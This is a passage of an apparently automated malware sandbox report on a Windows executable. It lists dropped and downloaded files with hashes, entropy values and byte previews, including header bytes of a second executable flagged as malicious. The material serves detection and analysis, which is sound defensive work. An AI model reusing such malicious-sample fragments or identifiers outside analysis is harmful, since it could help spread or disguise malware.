                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....x..;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 22:49:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                        Entropy (8bit):3.977074019010531
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:8VdYTcXwsHLidAKZdA1hehBiZUk1W1qeh+y+C:8AvR9ey
                                                                                                                                                                                                                                                        MD5:B282689D2D23102D1750C8DA59944391
                                                                                                                                                                                                                                                        SHA1:55446BE73135D47289E8450E1135C7455422B110
                                                                                                                                                                                                                                                        SHA-256:020A7997FA7751A269A3D14BB49066E117D85A319BB49BE918C3B81D0EE02026
                                                                                                                                                                                                                                                        SHA-512:2A1B20A08F869E1B9DB0DCF418FF1B8022F0300BD1E1ABDC3CFA84C7C7E6CBF55F743B8CDFA61241D48DCF549728CF7F51778217709351DA9BEF5EE57B3D86CA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....!..;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 22:49:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                                        Entropy (8bit):3.9869191644852715
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:88dYTcXwsHLidAKZdA1duT+ehOuTbbiZUk5OjqehOuTb4y+yT+:8nvNT/TbxWOvTb4y7T
                                                                                                                                                                                                                                                        MD5:6FEACC028DF80BA371D4DF26E934A35F
                                                                                                                                                                                                                                                        SHA1:E13B278CFED7105CF68E15D81E141B3D6E9B2534
                                                                                                                                                                                                                                                        SHA-256:382FAE9F64ADE2BC593ED32E6155070AEFE7CA2C2B25E1A9CE70ED57A6147887
                                                                                                                                                                                                                                                        SHA-512:3BD88DFCBABAE3A1D9704B731CAD32F1F59EF63BF1606C5CCAE3405087E88D4BB4694C7F66DD3E77FFA256D414FECF38B7B410AD8A3AEB3927836C988AEDA913
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.......;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1916416
                                                                                                                                                                                                                                                        Entropy (8bit):7.951304925887271
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:WOaQDq1v/ossxzde9Uf9zwOendehMA6NyUlDv:WvQDsdsxxl05ndNy8D
                                                                                                                                                                                                                                                        MD5:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        SHA1:5E74F927EBD1E7811A271ACEC5AEDD2E8BE75353
                                                                                                                                                                                                                                                        SHA-256:DEC01788D36A2CE2175CB87588E7FA92F8052E86BF9CAC3B51AE3A04213E8FBD
                                                                                                                                                                                                                                                        SHA-512:B2AF792E1BFC2239FFB57824AEE782727A9D3886DCE7F3F15A797D031A6E26F8667D9F20C6FBF21D820FC9B50B6FEEB106E9AE1CA88DAB745D93356E9F0EF5BA
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f............................. L...........@..........................PL...........@.................................W...k.......H...................0.L...............................L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .@+.........................@...yasgrbfq. ....1.. ..................@...lwauugho......L.....................@....taggant.0... L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\DocumentsCAFHDBGHJK.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):290
                                                                                                                                                                                                                                                        Entropy (8bit):3.415344194300242
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:JWIoX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBxl/81ut0:JVCuQ1CGAFifXVBj/8ct0
                                                                                                                                                                                                                                                        MD5:02242726FC133CB9DBE0A28CC1D0921B
                                                                                                                                                                                                                                                        SHA1:78A1CF3EC8D156BAFEF70B6D7E9C72839B0C2410
                                                                                                                                                                                                                                                        SHA-256:C5DB56B868423F1C9C16B61BCA32053590247F380C1E454A0499FA49BBE4DBDD
                                                                                                                                                                                                                                                        SHA-512:CC03A09D77381BEDAB2410406A1797EC6E83C0888B9F2BF375E00E60B449E50C679EB2970974EBB8835572BECE7207B415B61D9A897A3F39F96EC13917AE26FB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.....3p..._O..{.-..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................2.@3P.........................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (3936)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3942
                                                                                                                                                                                                                                                        Entropy (8bit):5.8364211437911955
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9A5liBUnIN6666Ve9BvL1PJT7OJZzfPL7ti0VbQ9uwffffQo:9Av1IN6666Ve71hTIzfP30QbQ9H
                                                                                                                                                                                                                                                        MD5:D6BE47B0D90B8969162AC1E607599866
                                                                                                                                                                                                                                                        SHA1:D9AE12458399F7855DB12793DC5627FDBFF4093C
                                                                                                                                                                                                                                                        SHA-256:8D7DC03C3B5636657594CA62C75182A097F925CA37179F09CB919C1319855C12
                                                                                                                                                                                                                                                        SHA-512:00F86355E36CF028DC8819282A6E719F8711D29112B9FA3D954119A0800686821846A2B97EDFE66929371FB097C2D15A44A825C48CF94CB9FC0429F5E7011728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                        Preview:)]}'.["",["overwatch hazard hero","pok.mon tcg pocket","ssi december direct payments","pentagon gofast ufo","snow forecast pennsylvania","boston bruins coach jim montgomery","nier automata dlc stellar blade","nyt crossword clues"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wMnFtal8wEixKaW0gTW9udGdvbWVyeSDigJQgQ2FuYWRpYW4gaWNlIGhvY2tleSBjb2FjaDLjEGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWFBQUFEQVFFQkFRQUFBQUFBQUFBQUFBQUZCZ2NFQXdJQS84UUFOUkFBQWdFREFnTUZCZ1VFQXdBQUFBQUFBUUlEQkFVU
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):175021
                                                                                                                                                                                                                                                        Entropy (8bit):5.5519862292821776
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:kEBR0Kx4gWiUIzT2Zu2AuhZNsWGUHUylZBTftnn2N2DIWHUm1CBT46mG3bXnejYR:kKR0oWiUIzy42AuXNsWGUHLlZBTftn2b
                                                                                                                                                                                                                                                        MD5:6ECBEC06F6245882E6D9659E66022263
                                                                                                                                                                                                                                                        SHA1:F86FC301A3851511557DF798AD2BAD2AA4659946
                                                                                                                                                                                                                                                        SHA-256:F7885470D82B8357E5AD03205AC0885DD9FD6F965E550D746627E5E35D4CF66B
                                                                                                                                                                                                                                                        SHA-512:F2EDD978C9DC289B82DC0956503659B92C3B621DD1001DB2C5C34ACA01FFCDE7F84A6B24ED0B30A1EA6B15D937B6DD93FAE1DB97DCE26E9F9FCE1A3F5C43A8DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTus2ZfPv70D5bJuGT4XDgi-VtNqjg"
                                                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj||(_.bj=new cj)).set(a,b);(_.dj||(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a|1};_.lj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.mj=function(a,b,c){32&b&&c||(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):132981
                                                                                                                                                                                                                                                        Entropy (8bit):5.435086881836806
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:fWkXyPqO7UX1Hme9kZbs4Voc5WSnXqwQ2i6o:fJyWFHrp4Voc5WSnawQ8o
                                                                                                                                                                                                                                                        MD5:F3D076AEF286BBE5177F560FF016ED8C
                                                                                                                                                                                                                                                        SHA1:35F68FCA686E4822745CB827DB60AD076FD5EA1E
                                                                                                                                                                                                                                                        SHA-256:5B5618C1F99E327A951B987D0CF9F2FF1732452DBEA76053AE05250F8A889DB0
                                                                                                                                                                                                                                                        SHA-512:9C150F2AC2FDB6C8BFEAE716A624A9CE1C5511307DDFDBF57858A872E748C28B37EE1723EB759AD87591587548C2137D5543610499AEC83F962BCDD92DC9DED6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5162
                                                                                                                                                                                                                                                        Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                        MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                        SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                        SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                        SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                        Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1660
                                                                                                                                                                                                                                                        Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                        MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                        SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                        SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                        SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):7.943391000067245
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File size:1'814'528 bytes
                                                                                                                                                                                                                                                        MD5:d90a0fa7d1b136c6aaa035f6bc5602fa
                                                                                                                                                                                                                                                        SHA1:1e236ca8b781f344a4738c1810b3c819ec72fac5
                                                                                                                                                                                                                                                        SHA256:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
                                                                                                                                                                                                                                                        SHA512:161375c3c6d2abea6d3697fe79832c1928cefd2529e222f444f057ffa282eed8e7780c683a64903f16732022f0629c26826abab4ceacf9b78cbaaaf3d805e67a
                                                                                                                                                                                                                                                        SSDEEP:49152:toBu4wjPsAgeUE+SERjvwfG1SxNGtvloF:+egJvOGkbKloF
                                                                                                                                                                                                                                                        TLSH:1C8533115B994625EC084C31685AAFF978CC04940F96EFDDEEC7174676A2BF3ACC0C69
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                        Entrypoint:0xa97000
                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
